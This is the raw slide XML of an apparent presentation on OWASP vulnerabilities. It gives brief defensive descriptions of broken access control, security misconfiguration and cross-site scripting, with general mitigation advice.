        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23640205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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP VULNERABILITIES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="3892168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit fontScale="47500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Broken Access Control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-GB" sz="4400" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If authentication and access restriction are not properly implemented, it's easy for attackers to take whatever they want. With broken access control flaws, unauthenticated or unauthorized users may have access to sensitive files and systems, or even user privilege settings.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-GB" sz="4400" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Configuration errors and insecure access control practices are hard to detect as automated processes cannot always test for them. Penetration testing can detect missing authentication, but other methods must be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4300" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>used to determine configuration problems. Weak access controls and issues with credentials management are preventable with secure coding practices, as well as preventative measures like locking down administrative accounts and controls and using multi-factor authentication.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6967062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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP VULNERABILITIES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="3892168"/>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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4300" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Misconfiguration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-GB" sz="4300" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4300" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Just like misconfigured access controls, more general security configuration errors are huge risks that give attackers quick, easy access to sensitive data and site areas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-GB" sz="4300" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4300" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dynamic testing can help you discover misconfigured security in your application.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="80629817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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SECURITY MISCONFIGURATION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{C21CE008-A8C5-4A34-9A89-B28FF9028D9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4238625" y="942975"/>
            <a:ext cx="3714750" cy="4972050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="170475708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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP VULNERABILITIES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="3892168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242626"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Fira Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4300" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-GB" sz="4300" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4300" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With cross-site scripting, attackers take advantage of APIs and DOM manipulation to retrieve data from or send commands to your application. Cross-site scripting widens the attack surface for threat actors, enabling them to hijack user accounts, access browser histories, spread Trojans and worms, control browsers remotely, and more.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-GB" sz="4300" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4300" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Training developers in best practices such as data encoding and input validation reduces the likelihood of this risk. Sanitize your data by validating that it’s the content you expect for that particular field, and by encoding it for the “endpoint” as an extra layer of protection.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235207692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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSS/XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{24A9A443-9D37-4F06-BC0F-03AB50DEE5D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3992880" y="523811"/>
            <a:ext cx="3981450" cy="4667250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187451142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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSS/XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{3573BCDA-4494-479B-BCB5-CEF966954B66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2805112" y="933450"/>
            <a:ext cx="6581775" cy="4991100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
